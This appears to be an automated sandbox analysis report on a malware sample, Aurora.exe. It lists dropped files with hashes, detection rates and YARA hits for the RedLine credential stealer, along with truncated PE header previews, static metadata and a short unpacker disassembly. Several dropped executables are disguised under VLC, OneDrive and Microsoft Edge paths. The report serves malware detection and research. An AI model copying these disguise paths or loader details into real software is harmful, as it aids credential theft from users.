                                  SHA-512:7A50BD0B3908F830494B2BFF13A051BA0CDC7900934DBF8A62616F6D29B914F05F8029BBCC429A095254EBB6AB2A2D92C05DD6AEBF57E34CDE20F152243DF383
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 67%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\.&U.bH..bH..bH......bH.W.L..bH.W.K..bH.W.M..bH.W.I..bH...I..bH..bI..bH...M..bH...J..bH.Rich.bH.................PE..d...2#Od.........."....".....j.................@.........................................`.................................................d(.......`.......P...............p..|... ...................................@...............X............................text............................... ..`.rdata..RN.......P..................@..@.data........@.......&..............@....pdata.......P......................@..@.rsrc........`.......<..............@..@.reloc..|....p.......>..............@..B................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Users\user\Desktop\Aurora.exe
                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):81920
                                  Entropy (8bit):6.050968204460563
                                  Encrypted:false
                                  SSDEEP:1536:pTrGHaLZS5k/fTO7UKkCTYHm2aopjB2UcSkZmi/ndOLUL:EHaLkS/XS6aop9Bj6HndOLU
                                  MD5:65F0A85C4B056D6BCEE60C49E2372E35
                                  SHA1:6AF820A2030950617BF150777AF4A43A06A17184
                                  SHA-256:D64768EA74224057220BFF451504B6128DDFB6161617B668626C490C84B3AE8E
                                  SHA-512:7A50BD0B3908F830494B2BFF13A051BA0CDC7900934DBF8A62616F6D29B914F05F8029BBCC429A095254EBB6AB2A2D92C05DD6AEBF57E34CDE20F152243DF383
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 67%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\.&U.bH..bH..bH......bH.W.L..bH.W.K..bH.W.M..bH.W.I..bH...I..bH..bI..bH...M..bH...J..bH.Rich.bH.................PE..d...2#Od.........."....".....j.................@.........................................`.................................................d(.......`.......P...............p..|... ...................................@...............X............................text............................... ..`.rdata..RN.......P..................@..@.data........@.......&..............@....pdata.......P......................@..@.rsrc........`.......<..............@..@.reloc..|....p.......>..............@..B................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exe
                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):5846920
                                  Entropy (8bit):7.706908459684143
                                  Encrypted:false
                                  SSDEEP:98304:25h3DyR3bargjfCgmnokEFhmqmnScD5AJUvYvmgOYPh:2jYrugTCgmoljmDnHD5AJUQOYPh
                                  MD5:B9FC8581B52ABFC6B563DA731438E27D
                                  SHA1:43111FE9B307C850A379FE2D64D279E994680DE3
                                  SHA-256:E03DEBE75B2F4F4C937C50773064B9A692B262BFCE4472E67900EDF3F7726058
                                  SHA-512:C62540E73870CAF9A93FBC2396AC99867F8F6E87661240D7642022130008BDB769954F1E8A58D13698172E62CC5B7D44A73B2F1D999DB47822EB294C629436A5
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 53%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....E4d...............&......Y................@..............................Y......lY...`... ..............................................PY.4.....Y.8.....Y.d.....Y..#....Y.0........................... .X.(....................RY.P............................text...............................`..`.data...@.W.......W.................@....rdata...;....X..<....X.............@..@.pdata..d.....Y.......X.............@..@.xdata....... Y.......X.............@..@.bss.........0Y..........................idata..4....PY.......X.............@....CRT....`....`Y.......Y.............@....tls.........pY.......Y.............@....rsrc...8.....Y.......Y.............@....reloc..0.....Y.......Y.............@..B........................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\Aurora.exe
                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):97792
                                  Entropy (8bit):5.9606766633428006
                                  Encrypted:false
                                  SSDEEP:1536:5qsCbqDylbG6jejoigIj43Ywzi0Zb78ivombfexv0ujXyyed2x3tmulgS6p8l:XEwiYj+zi0ZbYe1g0ujyzdd8
                                  MD5:C9A9D471428A5F92068C0823E6454254
                                  SHA1:8B8EE8612B9B8BFBB165B3A8CA0D4A377B589DD2
                                  SHA-256:B0FFAA8C7D8FE1E804AFC87E6F7659483C69D421911DDBFC410270011B91BFB5
                                  SHA-512:CA34022E99A48639FB3566EC4EB901A2F91121AEE6A1F1BC601492DD94387873AFC8AF499AEFED8D644AEF8F564CA46A12EA40176DA7F8D7B4E60F4B505AC8AF
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe, Author: Joe Security
                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe, Author: Joe Security
                                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe, Author: unknown
                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe, Author: ditekSHen
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 96%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..t..........>.... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...Ds... ...t.................. ..`.rsrc................v..............@..@.reloc...............|..............@..B................ .......H...........0.......C....................................................0.. .......s......~....%-.&~..........s....%.....(...+o.....8.....o............%........%.....(....s.....%.......%.....(....s.....%.......%.....(....s.....(....o.....8F.....(.....s......s,.......~....}....~.........s....(....o....}......{...........%.....(....s....o....,.......%.....(....s......+O..>.....%.....(....s....r...p~....(....(....o....-...{....(....+...{....(........(....:V......o........(....o
                                  Process:C:\Users\user\Desktop\Aurora.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):3305984
                                  Entropy (8bit):7.998639087761014
                                  Encrypted:true
                                  SSDEEP:98304:pV8fQuKXwLIWpW5PXlONhPgw0EjnrSMH:T81KYdU1ihPgwLnrx
                                  MD5:3B4F58CD4BCA7274BE25E885BE00798B
                                  SHA1:EB57C281D8324A1079DB97C9DA43483A65DEBBED
                                  SHA-256:A6832546E1D261C33DEEA58E1CBB8A391AF91628B130454D55AEF3E292862D80
                                  SHA-512:DC909730B2FEACBA3C14C98A2B443D5C12DFD74CE74DB53CF7E564E01707AC365811E4D3B95C0CEFE2B87EBD1B074FB4A395360911C3D11DE4FA8957E9BAD121
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 68%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$.Od.................h2...........2.. ....2...@.. ........................2...........@.................................l.2.O.....2.......................2...................................................... ............... ..H............text....f2.. ...h2................. ..`.rsrc.........2......j2.............@..@.reloc........2......p2.............@..B..................2.....H.........2..~...........1....1.............................................{E/^.( ...r5..p~'....(X...*^.("...r{..p~(....(X...*^.($...r...p~)....(X...*^.(&...r...p~*....(X...*^.((...rM..p~+....(X...*^.(*...r...p~,....(X...*^.(,...r...p~-....(X...*^.(....r...p~.....(X...*^.(0...re..p~/....(X...*^.(2...r...p~0....(X...*^.(4...r...p~1....(X...*^.(6...r7..p~2....(X...*^.(8...r}..p~3....(X...*^.(:...r...p~4....(X...*^.(<...r...p~5....(X...*^.(>...rO..p~6....(X...*^.(@...r...p~7..
                                  Process:C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):3305984
                                  Entropy (8bit):7.998639087761014
                                  Encrypted:true
                                  SSDEEP:98304:pV8fQuKXwLIWpW5PXlONhPgw0EjnrSMH:T81KYdU1ihPgwLnrx
                                  MD5:3B4F58CD4BCA7274BE25E885BE00798B
                                  SHA1:EB57C281D8324A1079DB97C9DA43483A65DEBBED
                                  SHA-256:A6832546E1D261C33DEEA58E1CBB8A391AF91628B130454D55AEF3E292862D80
                                  SHA-512:DC909730B2FEACBA3C14C98A2B443D5C12DFD74CE74DB53CF7E564E01707AC365811E4D3B95C0CEFE2B87EBD1B074FB4A395360911C3D11DE4FA8957E9BAD121
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 68%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$.Od.................h2...........2.. ....2...@.. ........................2...........@.................................l.2.O.....2.......................2...................................................... ............... ..H............text....f2.. ...h2................. ..`.rsrc.........2......j2.............@..@.reloc........2......p2.............@..B..................2.....H.........2..~...........1....1.............................................{E/^.( ...r5..p~'....(X...*^.("...r{..p~(....(X...*^.($...r...p~)....(X...*^.(&...r...p~*....(X...*^.((...rM..p~+....(X...*^.(*...r...p~,....(X...*^.(,...r...p~-....(X...*^.(....r...p~.....(X...*^.(0...re..p~/....(X...*^.(2...r...p~0....(X...*^.(4...r...p~1....(X...*^.(6...r7..p~2....(X...*^.(8...r}..p~3....(X...*^.(:...r...p~4....(X...*^.(<...r...p~5....(X...*^.(>...rO..p~6....(X...*^.(@...r...p~7..
                                  Process:C:\Users\user\Desktop\Aurora.exe
                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):5846920
                                  Entropy (8bit):7.706908459684143
                                  Encrypted:false
                                  SSDEEP:98304:25h3DyR3bargjfCgmnokEFhmqmnScD5AJUvYvmgOYPh:2jYrugTCgmoljmDnHD5AJUQOYPh
                                  MD5:B9FC8581B52ABFC6B563DA731438E27D
                                  SHA1:43111FE9B307C850A379FE2D64D279E994680DE3
                                  SHA-256:E03DEBE75B2F4F4C937C50773064B9A692B262BFCE4472E67900EDF3F7726058
                                  SHA-512:C62540E73870CAF9A93FBC2396AC99867F8F6E87661240D7642022130008BDB769954F1E8A58D13698172E62CC5B7D44A73B2F1D999DB47822EB294C629436A5
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 53%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....E4d...............&......Y................@..............................Y......lY...`... ..............................................PY.4.....Y.8.....Y.d.....Y..#....Y.0........................... .X.(....................RY.P............................text...............................`..`.data...@.W.......W.................@....rdata...;....X..<....X.............@..@.pdata..d.....Y.......X.............@..@.xdata....... Y.......X.............@..@.bss.........0Y..........................idata..4....PY.......X.............@....CRT....`....`Y.......Y.............@....tls.........pY.......Y.............@....rsrc...8.....Y.......Y.............@....reloc..0.....Y.......Y.............@..B........................................................................................................................................................................
                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1835008
                                  Entropy (8bit):4.465472739938839
                                  Encrypted:false
                                  SSDEEP:6144:cw6IXfpi67eLPU9skLmb0b4aWSPKaJG8nAgejZMMhA2gX4WABl0uNHdwBCswSbF:cwPXD94aWlLZMM6YFHJ+F
                                  MD5:136DC1113969CA9AC2A0A5A343FC5473
                                  SHA1:6DFF2083C09C171C030D9084377CDA1C93C7A26A
                                  SHA-256:0F6E92FAED5E2CDCF77A9574FB6DF27C1289EF040CF3F15DE6745045585FF269
                                  SHA-512:82393008C737AF14E6AF21C7042D6E9D2929FCC0A2352DEAE3CBBD7B596D56441D3BBF14D3A053984276FF5C529CA1F1CC7E7004D2C7EF4D06AD08BABE99EE9E
                                  Malicious:false
                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm&K{..................................................................................................................................................................................................................................................................................................................................................m.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\Aurora.exe
                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):1048576
                                  Entropy (8bit):6.141453390801126
                                  Encrypted:false
                                  SSDEEP:24576:ZNylo5lODLam3rb/T9vO90d7HjmAFd4A64nsfJnAzpmH3cNWc:HylyQLtrb/T9vO90d7HjmAFd4A64nsfy
                                  MD5:BDBC5A0F4BACF05D30C47F759DF837DC
                                  SHA1:ADEF596B217CCDA83755DAE64199E0DC2FB20C97
                                  SHA-256:8835F8B315595879F72216FE86A3E965FEB3729961C749284500440596789935
                                  SHA-512:2C3E1A7446558E874CA7C5E8975FC772012FB3C32CF48CFB436C78B5B573D3810D546209489BFA9D66C0E3EAA9DD25D0634F204B0397552E648CFC6CE636DCAD
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....c.....J....&....%..P..X.................@....................................@Z....`... .........................................Y...................`..pV...............B..........................@K..(......................x............................text...`.P.......P.................`..`.data....}....P..~....P.............@....rdata....B..`U...B..HU.............@..@.pdata..pV...`...X...@..............@..@.xdata...d.......f..................@..@.bss....$....0...........................edata..Y...........................@..@.idata.............................@....CRT....h..........................@....tls................................@....reloc...B.......D..................@..B/4...........`.......^..............@..B/19.....W.G..p....G..b..............@..B/31......&.......(...~..............@..B/45.....g.!.......!.................@..B/57.....
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.998736003048618
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:Aurora.exe
                                  File size:22'316'547 bytes
                                  MD5:416de11d210ae0ff50214021ff57b32b
                                  SHA1:3142453c18080b83d8dbdeba89524beea1c94ff3
                                  SHA256:72e1fc6da0a5cfca80413b8b24a880b0688908264971cfedaf079ee52ce4d850
                                  SHA512:e1f061f99e9e4e42c21269a32c9f3cfa711a8a95caf7628637d5606ae7846fc73ae982b0ee78646026c41e5c1e61e21a15829967d2fed534070e3c40e2731e4c
                                  SSDEEP:393216:TYTogFuaMaKQy6SSTMX3q7wLta40K3pNPS4n+yubbcEVPxEV+aqdvx1LB1x8NFN:TYT1Fu/6SSTMq+YK3Hx+3r5Np1FL8NF
                                  TLSH:8B273397945BFFF4F0BC23F455CF64B688B1052A36A8C3187C38BB9FE9856246A85071
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#Od.................. .........`.x.. .... ...@.. ...............................3U...@................................
                                  Icon Hash:90cececece8e8eb0
                                  Entrypoint:0x1b8c160
                                  Entrypoint Section:.boot
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x644F23F4 [Mon May 1 02:29:08 2023 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:4328f7206db519cd4e82283211d98e83
                                  Instruction
                                  call 00007F26D0CFA1C0h
                                  push ebx
                                  mov ebx, esp
                                  push ebx
                                  mov esi, dword ptr [ebx+08h]
                                  mov edi, dword ptr [ebx+10h]
                                  cld
                                  mov dl, 80h
                                  mov al, byte ptr [esi]
                                  inc esi
                                  mov byte ptr [edi], al
                                  inc edi
                                  mov ebx, 00000002h
                                  add dl, dl
                                  jne 00007F26D0CFA077h
                                  mov dl, byte ptr [esi]
                                  inc esi
                                  adc dl, dl
                                  jnc 00007F26D0CFA05Ch
                                  add dl, dl
